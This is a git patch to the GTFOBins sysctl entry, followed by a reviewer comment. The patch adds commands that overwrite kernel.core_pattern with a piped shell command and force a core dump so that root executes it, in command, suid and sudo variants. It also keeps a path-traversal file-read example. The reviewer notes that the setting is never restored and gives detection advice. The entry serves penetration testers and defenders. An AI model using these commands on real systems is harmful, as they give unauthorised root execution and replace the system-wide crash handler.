From 21e0166608d0c128a6cbab5b073d21c1b81cf297 Mon Sep 17 00:00:00 2001
From: decrazyo
Date: Fri, 16 Dec 2022 10:12:13 -0600
Subject: [PATCH] Update sysctl

Co-authored-by: Andrea Cardaci
---
 _gtfobins/sysctl.md | 26 ++++++++++++++++++++------
 1 file changed, 20 insertions(+), 6 deletions(-)

diff --git a/_gtfobins/sysctl.md b/_gtfobins/sysctl.md
index cef069e..01c0bae 100644
--- a/_gtfobins/sysctl.md
+++ b/_gtfobins/sysctl.md
@@ -1,16 +1,30 @@
 ---
-description: The `-p` argument can also be used in place of `-n`. In both cases though the output might get corrupted, so this might not be suitable to read binary files.
 functions:
+ command:
+ - description: The command is executed by root in the background when a core dump occurs.
+ code: |
+ COMMAND='/bin/sh -c id>/tmp/id'
+ sysctl "kernel.core_pattern=|$COMMAND"
+ sleep 9999 &
+ kill -QUIT $!
+ cat /tmp/id
 file-read:
- - code: |
+ - description: The `-p` argument can also be used in place of `-n`. In both cases though the output might get corrupted, so this might not be suitable to read binary files.
+ code: |
 LFILE=file_to_read
 /usr/sbin/sysctl -n "/../../$LFILE"
 suid:
 - code: |
- LFILE=file_to_read
- ./sysctl -n "/../../$LFILE"
+ COMMAND='/bin/sh -c id>/tmp/id'
+ ./sysctl "kernel.core_pattern=|$COMMAND"
+ sleep 9999 &
+ kill -QUIT $!
+ cat /tmp/id
 sudo:
 - code: |
- LFILE=file_to_read
- sudo sysctl -n "/../../$LFILE"
+ COMMAND='/bin/sh -c id>/tmp/id'
+ sudo sysctl "kernel.core_pattern=|$COMMAND"
+ sleep 9999 &
+ kill -QUIT $!
+ cat /tmp/id
 ---
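Review bot: The new `command`, `suid` and `sudo` examples overwrite `kernel.core_pattern` and never restore it, and the only description (on `command`) does not mention this. The setting is system-wide, so the host's normal crash handler stays replaced and the configured helper keeps running as root on every later core dump until the value is reset. I would extend the description with a sentence such as `This replaces the system-wide core dump handler; record the previous value with sysctl -n kernel.core_pattern and restore it afterwards.` and repeat it on the `suid` and `sudo` entries, which carry no description at all. The same place could note for defenders that a `kernel.core_pattern` value starting with `|` that does not match the distribution's own handler is worth alerting on, and that writes to `/proc/sys/kernel/core_pattern` can be audited.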